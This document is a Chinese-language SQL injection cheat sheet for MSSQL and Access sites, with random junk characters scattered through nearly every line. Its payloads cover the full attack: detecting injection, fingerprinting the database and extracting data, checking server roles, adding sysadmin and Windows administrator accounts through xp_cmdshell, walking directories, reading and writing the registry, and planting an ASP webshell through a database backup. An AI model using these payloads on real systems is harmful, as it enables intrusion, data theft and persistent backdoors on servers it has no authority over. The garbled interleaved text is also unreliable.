1.判断是否有注入;and 1=1 ;and 1=2 &Uzg&eB
2.初步判断是否是mssql ;and user>0 q'PA2a:
vh((HS-)
3.注入参数是字符'and [查询条件] and ''=' *`|F?wF
[IiwpC
4.搜索时没过滤参数的'and [查询条件] and '%25'=' x H\5T!
Zsaz#z|xW
5.判断数据库系统 `^RpT]S
FLi)EgZXt
;and (select count(*) from sysobjects)>0 mssql 7v#sr<
{D$#m
;and (select count(*) from msysobjects)>0 access -(~CZ
\
VJ3
"(/.3`g
FhW\23OC
6.猜数据库 ;and (select Count(*) from [数据库名])>0 9FK%"s`
Xn4U!<RT"
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ~p^6
Hcuvu[)T"
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 vTN$SgzfCU
UP^{'eh
9.(1)猜字段的ascii值(access) M~=9ym
8h}o5B
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 B xq(+^T
"\Z.YZUa\
(2)猜字段的ascii值(mssql) y?;&(Tcbt8
,{=#
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ?(4=:o
K'Wg_ihA
10.测试权限结构(mssql) vEk
jd#
YR^J7b\
W/L~&.'
Ak^g#^c*
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 0DV
.1
D `c
YQ-
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- N\BB8<F
FY@ErA7~
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- tY~EB.%
Z~CL|=
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- e3}`]
?zM]p"M
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- N*gnwrP{
|gg6|,Bt4
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ^9UKsy/q
1
\:5ow&a
;and 1=(select IS_MEMBER('db_owner'));-- 1/:WA:]1,
l03{
ezJk[
DY/xBwIF
a6cq0g[# z
11.添加mssql和系统的帐户 Q$^oIFb
?A+-k4l
;exec master.dbo.sp_addlogin username;-- %\IB_M
;exec master.dbo.sp_password null,username,password;-- F[RQ6PW
9`4M o+
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- D,b'1=
Fuq ;4UcbL
;exec master.dbo.xp_cmdshell 'net user username password 7&;M"?m&
h fZY5+Z<
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- wVX]"o
Au~l
O
;exec master.dbo.xp_cmdshell 'net user username password /add';-- !tJQ75Hwv
wrI66R}@
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- wyJ+~
c&me=WD
/vO8s??
]wb^5H
12.(1)遍历目录 c_wvuKa
-|V1A[
;create table dirs(paths varchar(100), id int) 89hV{^
DXA<m2&64N
;insert dirs exec master.dbo.xp_dirtree 'c:\' Wg{ 9X#|
4:wVT;?a
;and (select top 1 paths from dirs)>0 GYH{_Fq
uIh68UM
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ETZE.a
qHVZsZ
v
*icoj
r)<c
~\0 7
(2)遍历目录 # `L?24%
x
Zp`
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- CZZwBt$P
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 wH]5VltUT1
cPunMHD
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 zD^*->`p
,L_u
X
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 <8)cr0~zy>
<cm(QNdcC
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 JsP<etX
6&* z
h4ozwVA
Q Uy7Q$W
13.mssql中的存储过程 f?JP=j
wE~&Y?^
xp_regenumvalues 注册表根键, 子键 LO;7NK
+h]~m_O
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 :MaP58dhh
#nq$^H
xp_regread 根键,子键,键值名 d H N"pNNs
XgI;2Be+&a
;exec xp_regread Llf#g#T
Talmc|h
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 \X2r?
;~,)6UX7
xp_regwrite 根键,子键, 值名, 值类型, 值 Y6 <.]H
c/lT S
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 <EKTFHJ!
2WK c;?
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 "|Gr3 sD
8-B6D~i
xp_regdeletevalue 根键,子键,值名 70<{tjyc
J
?0P{{
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 RNo~}#
gb{8SG5ac
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 }Y"vUl_I2
B ({g|}|G+
2#(dfEAy
Skg}/Ek
14.mssql的backup创建webshell %At.nlss
D"msD"
use model XL7||9,(h
Ot+Z}Z-
create table cmd(str image); )g?ox{Hol
B[IWgvB(e
insert into cmd(str) values (''); EK&";(x2(
@# =yC.s
backup database model to disk='c:\l.asp'; ^[&,MQU{7
WjBH2 v
LAFxeo
Dz&,g+>$J
15.mssql内置函数 e3mFO+
m3~_uc/+D
;and (select @@version)>0 获得Windows的版本号 ||L^yI~_d
)Ma/]eZ^I
;and user_name()='dbo' 判断当前系统的连接用户是不是sa ce[
Maw
h1H$3TpP
;and (select user_name())>0 爆当前系统的连接用户 :='I>Gn
GExr] 2r
;and (select db_name())>0 得到当前连接的数据库 F9"Xu-g
~s
yWORiXm
_pmo
6O
zGdYk-H3TH
16.简洁的webshell 3Vbt(K
{+]tx46$
use model *aJO5&w<T
+eO>> ~Z
create table cmd(str image); AB{zkEuK
(*b<IGi;
insert into cmd(str) values (''); W~PMR/^i
)~Gn7
backup database model to disk='g:\wwwtest\l.asp';